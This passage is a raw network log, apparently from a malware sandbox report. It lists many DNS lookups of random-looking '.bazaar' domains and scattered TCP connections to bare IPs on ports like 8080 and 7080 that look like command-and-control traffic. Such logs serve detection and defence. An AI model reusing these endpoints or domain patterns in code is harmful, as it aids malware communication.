| FR | 51.255.211.146:53 | aecfijafefip.bazaar | udp |
| GB | 159.89.249.249:53 | aecfijafefip.bazaar | udp |
| GB | 104.238.186.189:53 | aecfijafefip.bazaar | udp |
| IN | 139.59.23.241:53 | aecfijafefip.bazaar | udp |
| IT | 193.183.98.66:53 | aecfijafefip.bazaar | udp |
| IT | 94.177.171.127:53 | aecfijafefip.bazaar | udp |
| JP | 45.63.124.65:53 | aecfijafefip.bazaar | udp |
| LT | 212.24.98.54:53 | aecfijafefip.bazaar | udp |
| MD | 178.17.170.179:53 | aecfijafefip.bazaar | udp |
| NL | 185.208.208.141:53 | aecfijafefip.bazaar | udp |
| NL | 82.196.9.45:53 | aecfijafefip.bazaar | udp |
| NL | 146.185.176.36:53 | aecfijafefip.bazaar | udp |
| SE | 89.35.39.64:53 | aecfijafefip.bazaar | udp |
| RO | 89.18.27.167:53 | aecfijafefip.bazaar | udp |
| RU | 77.73.68.161:53 | aecfijafefip.bazaar | udp |
| RU | 91.217.137.37:53 | aecfijafefip.bazaar | udp |
| RU | 185.117.154.144:53 | aecfijafefip.bazaar | udp |
| SE | 176.126.70.119:53 | aecfijafefip.bazaar | udp |
| SG | 139.99.96.146:53 | aecfijafefip.bazaar | udp |
| UA | 217.12.210.54:53 | aecfijafefip.bazaar | udp |
| GB | 185.164.136.225:53 | aecfijafefip.bazaar | udp |
| US | 192.52.166.110:53 | aecfijafefip.bazaar | udp |
| US | 63.231.92.27:53 | aecfijafefip.bazaar | udp |
| CA | 66.70.211.246:53 | aecfijafefip.bazaar | udp |
| US | 96.47.228.108:53 | aecfijafefip.bazaar | udp |
| US | 45.32.160.206:53 | aecfijafefip.bazaar | udp |
| US | 128.52.130.209:53 | aecfijafefip.bazaar | udp |
| US | 35.196.105.24:53 | aecfijafefip.bazaar | udp |
| US | 172.98.193.42:53 | aecfijafefip.bazaar | udp |
| US | 162.248.241.94:53 | aecfijafefip.bazaar | udp |
| US | 107.172.42.186:53 | aecfijafefip.bazaar | udp |
| US | 167.99.153.82:53 | aecfijafefip.bazaar | udp |
| US | 138.197.25.214:53 | aecfijafefip.bazaar | udp |
| US | 69.164.196.21:53 | aecfijafefip.bazaar | udp |
| FR | 51.254.25.115:53 | ^eegilzfggir.bazaar | udp |
| IT | 193.183.98.66:53 | ^eegilzfggir.bazaar | udp |
| RU | 91.217.137.37:53 | ^eegilzfggir.bazaar | udp |
| FR | 87.98.175.85:53 | ^eegilzfggir.bazaar | udp |
| AT | 185.121.177.177:53 | ^eegilzfggir.bazaar | udp |
| ZA | 169.239.202.202:53 | ^eegilzfggir.bazaar | udp |
| US | 198.251.90.143:53 | ^eegilzfggir.bazaar | udp |
| AT | 5.132.191.104:53 | ^eegilzfggir.bazaar | udp |
| AU | 111.67.20.8:53 | ^eegilzfggir.bazaar | udp |
| AU | 163.53.248.170:53 | ^eegilzfggir.bazaar | udp |
| CA | 142.4.204.111:53 | ^eegilzfggir.bazaar | udp |
| CA | 142.4.205.47:53 | ^eegilzfggir.bazaar | udp |
| CA | 158.69.239.167:53 | ^eegilzfggir.bazaar | udp |
| CA | 104.37.195.178:53 | ^eegilzfggir.bazaar | udp |
| TR | 212.174.55.22:443 | tcp | |
| CA | 192.99.85.244:53 | ^eegilzfggir.bazaar | udp |
| CA | 158.69.160.164:53 | ^eegilzfggir.bazaar | udp |
| CH | 46.28.207.199:53 | ^eegilzfggir.bazaar | udp |
| ES | 84.78.128.76:2222 | tcp | |
| CH | 31.171.251.118:53 | ^eegilzfggir.bazaar | udp |
| CZ | 81.2.241.148:53 | ^eegilzfggir.bazaar | udp |
| FR | 51.254.25.115:53 | ^eegilzfggir.bazaar | udp |
| DE | 82.141.39.32:53 | ^eegilzfggir.bazaar | udp |
| DE | 50.3.82.215:53 | ^eegilzfggir.bazaar | udp |
| DE | 46.101.70.183:53 | ^eegilzfggir.bazaar | udp |
| DE | 5.45.97.127:53 | ^eegilzfggir.bazaar | udp |
| DE | 130.255.78.223:53 | ^eegilzfggir.bazaar | udp |
| DE | 144.76.133.38:53 | ^eegilzfggir.bazaar | udp |
| DE | 139.59.208.246:53 | ^eegilzfggir.bazaar | udp |
| DE | 172.104.136.243:53 | ^eegilzfggir.bazaar | udp |
| EC | 186.70.127.199:8090 | tcp | |
| EC | 45.71.112.70:53 | ^eegilzfggir.bazaar | udp |
| US | 104.131.103.37:8080 | tcp | |
| FR | 163.172.185.51:53 | ^eegilzfggir.bazaar | udp |
| FR | 87.98.175.85:53 | ^eegilzfggir.bazaar | udp |
| FR | 5.135.183.146:53 | ^eegilzfggir.bazaar | udp |
| FR | 51.255.48.78:53 | ^eegilzfggir.bazaar | udp |
| FR | 188.165.200.156:53 | ^eegilzfggir.bazaar | udp |
| ID | 203.153.216.189:7080 | tcp | |
| FR | 147.135.185.78:53 | ^eegilzfggir.bazaar | udp |
| FR | 92.222.97.145:53 | ^eegilzfggir.bazaar | udp |
| FR | 51.255.211.146:53 | ^eegilzfggir.bazaar | udp |
| GB | 159.89.249.249:53 | ^eegilzfggir.bazaar | udp |
| GB | 104.238.186.189:53 | ^eegilzfggir.bazaar | udp |
| IN | 139.59.23.241:53 | ^eegilzfggir.bazaar | udp |
| IT | 193.183.98.66:53 | ^eegilzfggir.bazaar | udp |
| IT | 94.177.171.127:53 | ^eegilzfggir.bazaar | udp |
| JP | 45.63.124.65:53 | ^eegilzfggir.bazaar | udp |
| LT | 212.24.98.54:53 | ^eegilzfggir.bazaar | udp |
| MD | 178.17.170.179:53 | ^eegilzfggir.bazaar | udp |
| NL | 185.208.208.141:53 | ^eegilzfggir.bazaar | udp |
| NL | 82.196.9.45:53 | ^eegilzfggir.bazaar | udp |
| NL | 146.185.176.36:53 | ^eegilzfggir.bazaar | udp |
| SE | 89.35.39.64:53 | ^eegilzfggir.bazaar | udp |
| RO | 89.18.27.167:53 | ^eegilzfggir.bazaar | udp |
| RU | 77.73.68.161:53 | ^eegilzfggir.bazaar | udp |
| RU | 91.217.137.37:53 | ^eegilzfggir.bazaar | udp |
| RU | 185.117.154.144:53 | ^eegilzfggir.bazaar | udp |
| SE | 176.126.70.119:53 | ^eegilzfggir.bazaar | udp |
| SG | 139.99.96.146:53 | ^eegilzfggir.bazaar | udp |
| UA | 217.12.210.54:53 | ^eegilzfggir.bazaar | udp |
| GB | 185.164.136.225:53 | ^eegilzfggir.bazaar | udp |
| US | 192.52.166.110:53 | ^eegilzfggir.bazaar | udp |
| US | 63.231.92.27:53 | ^eegilzfggir.bazaar | udp |
| CA | 66.70.211.246:53 | ^eegilzfggir.bazaar | udp |
| US | 96.47.228.108:53 | ^eegilzfggir.bazaar | udp |
| US | 45.32.160.206:53 | ^eegilzfggir.bazaar | udp |
| US | 128.52.130.209:53 | ^eegilzfggir.bazaar | udp |
| US | 35.196.105.24:53 | ^eegilzfggir.bazaar | udp |
| US | 172.98.193.42:53 | ^eegilzfggir.bazaar | udp |
| US | 162.248.241.94:53 | ^eegilzfggir.bazaar | udp |
| US | 107.172.42.186:53 | ^eegilzfggir.bazaar | udp |
| US | 167.99.153.82:53 | ^eegilzfggir.bazaar | udp |
| US | 138.197.25.214:53 | ^eegilzfggir.bazaar | udp |
| US | 69.164.196.21:53 | ^eegilzfggir.bazaar | udp |
| FR | 51.254.25.115:53 | acegimadggis.bazaar | udp |
| ES | 84.78.128.76:2222 | tcp | |
| IT | 193.183.98.66:53 | acegimadggis.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| RU | 91.217.137.37:53 | acegimadggis.bazaar | udp |
| FR | 87.98.175.85:53 | acegimadggis.bazaar | udp |
| AT | 185.121.177.177:53 | acegimadggis.bazaar | udp |
| ZA | 169.239.202.202:53 | acegimadggis.bazaar | udp |
| US | 198.251.90.143:53 | acegimadggis.bazaar | udp |
| AT | 5.132.191.104:53 | acegimadggis.bazaar | udp |
| AU | 111.67.20.8:53 | acegimadggis.bazaar | udp |
| AU | 163.53.248.170:53 | acegimadggis.bazaar | udp |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| CA | 142.4.204.111:53 | acegimadggis.bazaar | udp |
| CA | 142.4.205.47:53 | acegimadggis.bazaar | udp |
| CA | 158.69.239.167:53 | acegimadggis.bazaar | udp |
| CA | 104.37.195.178:53 | acegimadggis.bazaar | udp |
| CA | 192.99.85.244:53 | acegimadggis.bazaar | udp |
| CA | 158.69.160.164:53 | acegimadggis.bazaar | udp |
| CH | 46.28.207.199:53 | acegimadggis.bazaar | udp |
| CH | 31.171.251.118:53 | acegimadggis.bazaar | udp |
| CZ | 81.2.241.148:53 | acegimadggis.bazaar | udp |
| FR | 51.254.25.115:53 | acegimadggis.bazaar | udp |
| DE | 82.141.39.32:53 | acegimadggis.bazaar | udp |
| DE | 50.3.82.215:53 | acegimadggis.bazaar | udp |
| DE | 46.101.70.183:53 | acegimadggis.bazaar | udp |
| DE | 5.45.97.127:53 | acegimadggis.bazaar | udp |
| DE | 130.255.78.223:53 | acegimadggis.bazaar | udp |
| DE | 144.76.133.38:53 | acegimadggis.bazaar | udp |
| DE | 139.59.208.246:53 | acegimadggis.bazaar | udp |
| DE | 172.104.136.243:53 | acegimadggis.bazaar | udp |
| EC | 45.71.112.70:53 | acegimadggis.bazaar | udp |
| FR | 163.172.185.51:53 | acegimadggis.bazaar | udp |
| FR | 87.98.175.85:53 | acegimadggis.bazaar | udp |
| FR | 5.135.183.146:53 | acegimadggis.bazaar | udp |
| FR | 51.255.48.78:53 | acegimadggis.bazaar | udp |
| FR | 188.165.200.156:53 | acegimadggis.bazaar | udp |
| FR | 147.135.185.78:53 | acegimadggis.bazaar | udp |
| FR | 92.222.97.145:53 | acegimadggis.bazaar | udp |
| FR | 51.255.211.146:53 | acegimadggis.bazaar | udp |
| GB | 159.89.249.249:53 | acegimadggis.bazaar | udp |
| GB | 104.238.186.189:53 | acegimadggis.bazaar | udp |
| IN | 139.59.23.241:53 | acegimadggis.bazaar | udp |
| IT | 193.183.98.66:53 | acegimadggis.bazaar | udp |
| IT | 94.177.171.127:53 | acegimadggis.bazaar | udp |
| JP | 45.63.124.65:53 | acegimadggis.bazaar | udp |
| LT | 212.24.98.54:53 | acegimadggis.bazaar | udp |
| MD | 178.17.170.179:53 | acegimadggis.bazaar | udp |
| NL | 185.208.208.141:53 | acegimadggis.bazaar | udp |
| NL | 82.196.9.45:53 | acegimadggis.bazaar | udp |
| NL | 146.185.176.36:53 | acegimadggis.bazaar | udp |
| SE | 89.35.39.64:53 | acegimadggis.bazaar | udp |
| RO | 89.18.27.167:53 | acegimadggis.bazaar | udp |
| RU | 77.73.68.161:53 | acegimadggis.bazaar | udp |
| RU | 91.217.137.37:53 | acegimadggis.bazaar | udp |
| RU | 185.117.154.144:53 | acegimadggis.bazaar | udp |
| SE | 176.126.70.119:53 | acegimadggis.bazaar | udp |
| SG | 139.99.96.146:53 | acegimadggis.bazaar | udp |
| UA | 217.12.210.54:53 | acegimadggis.bazaar | udp |
| GB | 185.164.136.225:53 | acegimadggis.bazaar | udp |
| US | 192.52.166.110:53 | acegimadggis.bazaar | udp |
| US | 63.231.92.27:53 | acegimadggis.bazaar | udp |
| CA | 66.70.211.246:53 | acegimadggis.bazaar | udp |
| US | 96.47.228.108:53 | acegimadggis.bazaar | udp |
| US | 45.32.160.206:53 | acegimadggis.bazaar | udp |
| US | 128.52.130.209:53 | acegimadggis.bazaar | udp |
| US | 35.196.105.24:53 | acegimadggis.bazaar | udp |
| US | 172.98.193.42:53 | acegimadggis.bazaar | udp |
| US | 162.248.241.94:53 | acegimadggis.bazaar | udp |
| US | 107.172.42.186:53 | acegimadggis.bazaar | udp |
| US | 167.99.153.82:53 | acegimadggis.bazaar | udp |
| US | 138.197.25.214:53 | acegimadggis.bazaar | udp |
| US | 69.164.196.21:53 | acegimadggis.bazaar | udp |
| FR | 51.254.25.115:53 | bcehgkbdghgq.bazaar | udp |
| IT | 193.183.98.66:53 | bcehgkbdghgq.bazaar | udp |
| RU | 91.217.137.37:53 | bcehgkbdghgq.bazaar | udp |
| FR | 87.98.175.85:53 | bcehgkbdghgq.bazaar | udp |
| AT | 185.121.177.177:53 | bcehgkbdghgq.bazaar | udp |
| ZA | 169.239.202.202:53 | bcehgkbdghgq.bazaar | udp |
| US | 198.251.90.143:53 | bcehgkbdghgq.bazaar | udp |
| AT | 5.132.191.104:53 | bcehgkbdghgq.bazaar | udp |
| AU | 111.67.20.8:53 | bcehgkbdghgq.bazaar | udp |
| AU | 163.53.248.170:53 | bcehgkbdghgq.bazaar | udp |
| CA | 142.4.204.111:53 | bcehgkbdghgq.bazaar | udp |
| CA | 142.4.205.47:53 | bcehgkbdghgq.bazaar | udp |
| CA | 158.69.239.167:53 | bcehgkbdghgq.bazaar | udp |
| CA | 104.37.195.178:53 | bcehgkbdghgq.bazaar | udp |
| CA | 192.99.85.244:53 | bcehgkbdghgq.bazaar | udp |
| CA | 158.69.160.164:53 | bcehgkbdghgq.bazaar | udp |
| CH | 46.28.207.199:53 | bcehgkbdghgq.bazaar | udp |
| CH | 31.171.251.118:53 | bcehgkbdghgq.bazaar | udp |
| CZ | 81.2.241.148:53 | bcehgkbdghgq.bazaar | udp |
| US | 96.41.93.96:443 | tcp | |
| FR | 51.254.25.115:53 | bcehgkbdghgq.bazaar | udp |
| DE | 82.141.39.32:53 | bcehgkbdghgq.bazaar | udp |
| DE | 50.3.82.215:53 | bcehgkbdghgq.bazaar | udp |
| DE | 46.101.70.183:53 | bcehgkbdghgq.bazaar | udp |
| DE | 5.45.97.127:53 | bcehgkbdghgq.bazaar | udp |
| DE | 130.255.78.223:53 | bcehgkbdghgq.bazaar | udp |
| DE | 144.76.133.38:53 | bcehgkbdghgq.bazaar | udp |
| DE | 139.59.208.246:53 | bcehgkbdghgq.bazaar | udp |
| DE | 172.104.136.243:53 | bcehgkbdghgq.bazaar | udp |
| EC | 45.71.112.70:53 | bcehgkbdghgq.bazaar | udp |
| FR | 163.172.185.51:53 | bcehgkbdghgq.bazaar | udp |
| FR | 87.98.175.85:53 | bcehgkbdghgq.bazaar | udp |
| FR | 5.135.183.146:53 | bcehgkbdghgq.bazaar | udp |
| FR | 51.255.48.78:53 | bcehgkbdghgq.bazaar | udp |
| FR | 188.165.200.156:53 | bcehgkbdghgq.bazaar | udp |
| FR | 147.135.185.78:53 | bcehgkbdghgq.bazaar | udp |
| FR | 92.222.97.145:53 | bcehgkbdghgq.bazaar | udp |
| FR | 51.255.211.146:53 | bcehgkbdghgq.bazaar | udp |
| GB | 159.89.249.249:53 | bcehgkbdghgq.bazaar | udp |
| GB | 104.238.186.189:53 | bcehgkbdghgq.bazaar | udp |
| IN | 139.59.23.241:53 | bcehgkbdghgq.bazaar | udp |
| IT | 193.183.98.66:53 | bcehgkbdghgq.bazaar | udp |
| IT | 94.177.171.127:53 | bcehgkbdghgq.bazaar | udp |
| JP | 45.63.124.65:53 | bcehgkbdghgq.bazaar | udp |
| LT | 212.24.98.54:53 | bcehgkbdghgq.bazaar | udp |
| MD | 178.17.170.179:53 | bcehgkbdghgq.bazaar | udp |
| NL | 185.208.208.141:53 | bcehgkbdghgq.bazaar | udp |
| NL | 82.196.9.45:53 | bcehgkbdghgq.bazaar | udp |
| NL | 146.185.176.36:53 | bcehgkbdghgq.bazaar | udp |
| SE | 89.35.39.64:53 | bcehgkbdghgq.bazaar | udp |
| RO | 89.18.27.167:53 | bcehgkbdghgq.bazaar | udp |
| RU | 77.73.68.161:53 | bcehgkbdghgq.bazaar | udp |
| RU | 91.217.137.37:53 | bcehgkbdghgq.bazaar | udp |
| RU | 185.117.154.144:53 | bcehgkbdghgq.bazaar | udp |
| SE | 176.126.70.119:53 | bcehgkbdghgq.bazaar | udp |
| SG | 139.99.96.146:53 | bcehgkbdghgq.bazaar | udp |
| UA | 217.12.210.54:53 | bcehgkbdghgq.bazaar | udp |
| GB | 185.164.136.225:53 | bcehgkbdghgq.bazaar | udp |
| US | 192.52.166.110:53 | bcehgkbdghgq.bazaar | udp |
| US | 63.231.92.27:53 | bcehgkbdghgq.bazaar | udp |
| CA | 66.70.211.246:53 | bcehgkbdghgq.bazaar | udp |
| US | 96.47.228.108:53 | bcehgkbdghgq.bazaar | udp |
| US | 45.32.160.206:53 | bcehgkbdghgq.bazaar | udp |
| US | 128.52.130.209:53 | bcehgkbdghgq.bazaar | udp |
| US | 35.196.105.24:53 | bcehgkbdghgq.bazaar | udp |
| US | 172.98.193.42:53 | bcehgkbdghgq.bazaar | udp |
| US | 162.248.241.94:53 | bcehgkbdghgq.bazaar | udp |
| US | 107.172.42.186:53 | bcehgkbdghgq.bazaar | udp |
| US | 167.99.153.82:53 | bcehgkbdghgq.bazaar | udp |
| US | 138.197.25.214:53 | bcehgkbdghgq.bazaar | udp |
| US | 69.164.196.21:53 | bcehgkbdghgq.bazaar | udp |
| FR | 51.254.25.115:53 | caeiiicbgiio.bazaar | udp |
| IT | 193.183.98.66:53 | caeiiicbgiio.bazaar | udp |
| RU | 91.217.137.37:53 | caeiiicbgiio.bazaar | udp |
| FR | 87.98.175.85:53 | caeiiicbgiio.bazaar | udp |
| AT | 185.121.177.177:53 | caeiiicbgiio.bazaar | udp |
| ZA | 169.239.202.202:53 | caeiiicbgiio.bazaar | udp |
| US | 198.251.90.143:53 | caeiiicbgiio.bazaar | udp |
| AT | 5.132.191.104:53 | caeiiicbgiio.bazaar | udp |
| AU | 111.67.20.8:53 | caeiiicbgiio.bazaar | udp |
| AU | 163.53.248.170:53 | caeiiicbgiio.bazaar | udp |
| CA | 142.4.204.111:53 | caeiiicbgiio.bazaar | udp |
| CA | 142.4.205.47:53 | caeiiicbgiio.bazaar | udp |
| CA | 158.69.239.167:53 | caeiiicbgiio.bazaar | udp |
| CA | 104.37.195.178:53 | caeiiicbgiio.bazaar | udp |
| CA | 192.99.85.244:53 | caeiiicbgiio.bazaar | udp |
| CA | 158.69.160.164:53 | caeiiicbgiio.bazaar | udp |
| CH | 46.28.207.199:53 | caeiiicbgiio.bazaar | udp |
| CH | 31.171.251.118:53 | caeiiicbgiio.bazaar | udp |
| CZ | 81.2.241.148:53 | caeiiicbgiio.bazaar | udp |
| FR | 51.254.25.115:53 | caeiiicbgiio.bazaar | udp |
| DE | 82.141.39.32:53 | caeiiicbgiio.bazaar | udp |
| DE | 50.3.82.215:53 | caeiiicbgiio.bazaar | udp |
| DE | 46.101.70.183:53 | caeiiicbgiio.bazaar | udp |
| DE | 5.45.97.127:53 | caeiiicbgiio.bazaar | udp |
| DE | 130.255.78.223:53 | caeiiicbgiio.bazaar | udp |
| DE | 144.76.133.38:53 | caeiiicbgiio.bazaar | udp |
| DE | 139.59.208.246:53 | caeiiicbgiio.bazaar | udp |
| DE | 172.104.136.243:53 | caeiiicbgiio.bazaar | udp |
| EC | 45.71.112.70:53 | caeiiicbgiio.bazaar | udp |
| FR | 163.172.185.51:53 | caeiiicbgiio.bazaar | udp |
| FR | 87.98.175.85:53 | caeiiicbgiio.bazaar | udp |
| FR | 5.135.183.146:53 | caeiiicbgiio.bazaar | udp |
| FR | 51.255.48.78:53 | caeiiicbgiio.bazaar | udp |
| FR | 188.165.200.156:53 | caeiiicbgiio.bazaar | udp |
| FR | 147.135.185.78:53 | caeiiicbgiio.bazaar | udp |
| FR | 92.222.97.145:53 | caeiiicbgiio.bazaar | udp |
| FR | 51.255.211.146:53 | caeiiicbgiio.bazaar | udp |
| GB | 159.89.249.249:53 | caeiiicbgiio.bazaar | udp |
| GB | 104.238.186.189:53 | caeiiicbgiio.bazaar | udp |
| IN | 139.59.23.241:53 | caeiiicbgiio.bazaar | udp |
| IT | 193.183.98.66:53 | caeiiicbgiio.bazaar | udp |
| IT | 94.177.171.127:53 | caeiiicbgiio.bazaar | udp |
| JP | 45.63.124.65:53 | caeiiicbgiio.bazaar | udp |
| LT | 212.24.98.54:53 | caeiiicbgiio.bazaar | udp |
| MD | 178.17.170.179:53 | caeiiicbgiio.bazaar | udp |
| NL | 185.208.208.141:53 | caeiiicbgiio.bazaar | udp |
| NL | 82.196.9.45:53 | caeiiicbgiio.bazaar | udp |
| NL | 146.185.176.36:53 | caeiiicbgiio.bazaar | udp |
| SE | 89.35.39.64:53 | caeiiicbgiio.bazaar | udp |
| RO | 89.18.27.167:53 | caeiiicbgiio.bazaar | udp |
| RU | 77.73.68.161:53 | caeiiicbgiio.bazaar | udp |
| RU | 91.217.137.37:53 | caeiiicbgiio.bazaar | udp |
| RU | 185.117.154.144:53 | caeiiicbgiio.bazaar | udp |
| SE | 176.126.70.119:53 | caeiiicbgiio.bazaar | udp |
| SG | 139.99.96.146:53 | caeiiicbgiio.bazaar | udp |
| UA | 217.12.210.54:53 | caeiiicbgiio.bazaar | udp |
| GB | 185.164.136.225:53 | caeiiicbgiio.bazaar | udp |
| US | 192.52.166.110:53 | caeiiicbgiio.bazaar | udp |
| US | 63.231.92.27:53 | caeiiicbgiio.bazaar | udp |
| CA | 66.70.211.246:53 | caeiiicbgiio.bazaar | udp |
| US | 96.47.228.108:53 | caeiiicbgiio.bazaar | udp |
| US | 45.32.160.206:53 | caeiiicbgiio.bazaar | udp |
| US | 128.52.130.209:53 | caeiiicbgiio.bazaar | udp |
| US | 35.196.105.24:53 | caeiiicbgiio.bazaar | udp |
| US | 172.98.193.42:53 | caeiiicbgiio.bazaar | udp |
| US | 162.248.241.94:53 | caeiiicbgiio.bazaar | udp |
| US | 107.172.42.186:53 | caeiiicbgiio.bazaar | udp |
| US | 167.99.153.82:53 | caeiiicbgiio.bazaar | udp |
| US | 138.197.25.214:53 | caeiiicbgiio.bazaar | udp |
| US | 69.164.196.21:53 | caeiiicbgiio.bazaar | udp |
| FR | 51.254.25.115:53 | cadgikcbfgiq.bazaar | udp |
| IT | 193.183.98.66:53 | cadgikcbfgiq.bazaar | udp |
| RU | 91.217.137.37:53 | cadgikcbfgiq.bazaar | udp |
| FR | 87.98.175.85:53 | cadgikcbfgiq.bazaar | udp |
| AT | 185.121.177.177:53 | cadgikcbfgiq.bazaar | udp |
| ZA | 169.239.202.202:53 | cadgikcbfgiq.bazaar | udp |
| US | 198.251.90.143:53 | cadgikcbfgiq.bazaar | udp |
| RU | 176.96.238.128:443 | tcp | |
| AT | 5.132.191.104:53 | cadgikcbfgiq.bazaar | udp |
| AU | 111.67.20.8:53 | cadgikcbfgiq.bazaar | udp |
| AU | 163.53.248.170:53 | cadgikcbfgiq.bazaar | udp |
| CA | 142.4.204.111:53 | cadgikcbfgiq.bazaar | udp |
| CA | 142.4.205.47:53 | cadgikcbfgiq.bazaar | udp |
| CA | 158.69.239.167:53 | cadgikcbfgiq.bazaar | udp |
| CA | 104.37.195.178:53 | cadgikcbfgiq.bazaar | udp |
| US | 96.41.93.96:443 | tcp | |
| CA | 192.99.85.244:53 | cadgikcbfgiq.bazaar | udp |
| CA | 158.69.160.164:53 | cadgikcbfgiq.bazaar | udp |
| CH | 46.28.207.199:53 | cadgikcbfgiq.bazaar | udp |
| CH | 31.171.251.118:53 | cadgikcbfgiq.bazaar | udp |
| US | 45.33.77.42:8080 | tcp | |
| CZ | 81.2.241.148:53 | cadgikcbfgiq.bazaar | udp |
| FR | 51.254.25.115:53 | cadgikcbfgiq.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| DE | 82.141.39.32:53 | cadgikcbfgiq.bazaar | udp |
| TR | 85.105.140.135:443 | tcp | |
| DE | 50.3.82.215:53 | cadgikcbfgiq.bazaar | udp |
| DE | 46.101.70.183:53 | cadgikcbfgiq.bazaar | udp |
| DE | 5.45.97.127:53 | cadgikcbfgiq.bazaar | udp |
| DE | 130.255.78.223:53 | cadgikcbfgiq.bazaar | udp |
| DE | 144.76.133.38:53 | cadgikcbfgiq.bazaar | udp |
| DE | 139.59.208.246:53 | cadgikcbfgiq.bazaar | udp |
| DE | 172.104.136.243:53 | cadgikcbfgiq.bazaar | udp |
| EC | 181.211.11.242:80 | tcp | |
| EC | 45.71.112.70:53 | cadgikcbfgiq.bazaar | udp |
| FR | 163.172.185.51:53 | cadgikcbfgiq.bazaar | udp |
| FR | 87.98.175.85:53 | cadgikcbfgiq.bazaar | udp |
| FR | 5.135.183.146:53 | cadgikcbfgiq.bazaar | udp |
| FR | 51.255.48.78:53 | cadgikcbfgiq.bazaar | udp |
| FR | 188.165.200.156:53 | cadgikcbfgiq.bazaar | udp |
| FR | 147.135.185.78:53 | cadgikcbfgiq.bazaar | udp |
| FR | 92.222.97.145:53 | cadgikcbfgiq.bazaar | udp |
| FR | 51.255.211.146:53 | cadgikcbfgiq.bazaar | udp |
| GB | 159.89.249.249:53 | cadgikcbfgiq.bazaar | udp |
| GB | 104.238.186.189:53 | cadgikcbfgiq.bazaar | udp |
| US | 96.41.93.96:443 | tcp | |
| IN | 139.59.23.241:53 | cadgikcbfgiq.bazaar | udp |
| IT | 193.183.98.66:53 | cadgikcbfgiq.bazaar | udp |
| IT | 94.177.171.127:53 | cadgikcbfgiq.bazaar | udp |
| JP | 45.63.124.65:53 | cadgikcbfgiq.bazaar | udp |
| LT | 212.24.98.54:53 | cadgikcbfgiq.bazaar | udp |
| MD | 178.17.170.179:53 | cadgikcbfgiq.bazaar | udp |
| NL | 185.208.208.141:53 | cadgikcbfgiq.bazaar | udp |
| NL | 82.196.9.45:53 | cadgikcbfgiq.bazaar | udp |
| NL | 146.185.176.36:53 | cadgikcbfgiq.bazaar | udp |
| SE | 89.35.39.64:53 | cadgikcbfgiq.bazaar | udp |
| RO | 89.18.27.167:53 | cadgikcbfgiq.bazaar | udp |
| RU | 77.73.68.161:53 | cadgikcbfgiq.bazaar | udp |
| RU | 91.217.137.37:53 | cadgikcbfgiq.bazaar | udp |
| RU | 185.117.154.144:53 | cadgikcbfgiq.bazaar | udp |
| SE | 176.126.70.119:53 | cadgikcbfgiq.bazaar | udp |
| SG | 139.99.96.146:53 | cadgikcbfgiq.bazaar | udp |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| UA | 217.12.210.54:53 | cadgikcbfgiq.bazaar | udp |
| GB | 185.164.136.225:53 | cadgikcbfgiq.bazaar | udp |
| US | 192.52.166.110:53 | cadgikcbfgiq.bazaar | udp |
| US | 96.41.93.96:443 | tcp | |
| US | 63.231.92.27:53 | cadgikcbfgiq.bazaar | udp |
| CA | 66.70.211.246:53 | cadgikcbfgiq.bazaar | udp |
| US | 96.47.228.108:53 | cadgikcbfgiq.bazaar | udp |
| US | 45.32.160.206:53 | cadgikcbfgiq.bazaar | udp |
| US | 128.52.130.209:53 | cadgikcbfgiq.bazaar | udp |
| US | 35.196.105.24:53 | cadgikcbfgiq.bazaar | udp |
| US | 172.98.193.42:53 | cadgikcbfgiq.bazaar | udp |
| US | 162.248.241.94:53 | cadgikcbfgiq.bazaar | udp |
| US | 107.172.42.186:53 | cadgikcbfgiq.bazaar | udp |
| US | 167.99.153.82:53 | cadgikcbfgiq.bazaar | udp |
| US | 138.197.25.214:53 | cadgikcbfgiq.bazaar | udp |
| US | 69.164.196.21:53 | cadgikcbfgiq.bazaar | udp |
| FR | 51.254.25.115:53 | abfgikachgiq.bazaar | udp |
| IT | 193.183.98.66:53 | abfgikachgiq.bazaar | udp |
| RU | 91.217.137.37:53 | abfgikachgiq.bazaar | udp |
| FR | 87.98.175.85:53 | abfgikachgiq.bazaar | udp |
| AT | 185.121.177.177:53 | abfgikachgiq.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| US | 3.33.130.190:80 | www.lizoschwald.com | tcp |
| ZA | 169.239.202.202:53 | abfgikachgiq.bazaar | udp |
| US | 198.251.90.143:53 | abfgikachgiq.bazaar | udp |
| AT | 5.132.191.104:53 | abfgikachgiq.bazaar | udp |
| AU | 111.67.20.8:53 | abfgikachgiq.bazaar | udp |
| AU | 163.53.248.170:53 | abfgikachgiq.bazaar | udp |
| CA | 142.4.204.111:53 | abfgikachgiq.bazaar | udp |
| DE | 87.106.46.107:8080 | tcp | |
| CA | 142.4.205.47:53 | abfgikachgiq.bazaar | udp |
| BD | 103.106.236.83:8080 | tcp | |
| CA | 158.69.239.167:53 | abfgikachgiq.bazaar | udp |
| CA | 104.37.195.178:53 | abfgikachgiq.bazaar | udp |
| CA | 192.99.85.244:53 | abfgikachgiq.bazaar | udp |
| CA | 158.69.160.164:53 | abfgikachgiq.bazaar | udp |
| CH | 46.28.207.199:53 | abfgikachgiq.bazaar | udp |
| CH | 31.171.251.118:53 | abfgikachgiq.bazaar | udp |
| CZ | 81.2.241.148:53 | abfgikachgiq.bazaar | udp |
| FR | 51.254.25.115:53 | abfgikachgiq.bazaar | udp |
| DE | 82.141.39.32:53 | abfgikachgiq.bazaar | udp |
| DE | 50.3.82.215:53 | abfgikachgiq.bazaar | udp |
| DE | 46.101.70.183:53 | abfgikachgiq.bazaar | udp |
| DE | 5.45.97.127:53 | abfgikachgiq.bazaar | udp |
| DE | 130.255.78.223:53 | abfgikachgiq.bazaar | udp |
| DE | 144.76.133.38:53 | abfgikachgiq.bazaar | udp |
| DE | 139.59.208.246:53 | abfgikachgiq.bazaar | udp |
| DE | 172.104.136.243:53 | abfgikachgiq.bazaar | udp |
| EC | 45.71.112.70:53 | abfgikachgiq.bazaar | udp |
| FR | 163.172.185.51:53 | abfgikachgiq.bazaar | udp |
| FR | 87.98.175.85:53 | abfgikachgiq.bazaar | udp |
| FR | 5.135.183.146:53 | abfgikachgiq.bazaar | udp |
| FR | 51.255.48.78:53 | abfgikachgiq.bazaar | udp |
| FR | 188.165.200.156:53 | abfgikachgiq.bazaar | udp |
| FR | 147.135.185.78:53 | abfgikachgiq.bazaar | udp |
| FR | 92.222.97.145:53 | abfgikachgiq.bazaar | udp |
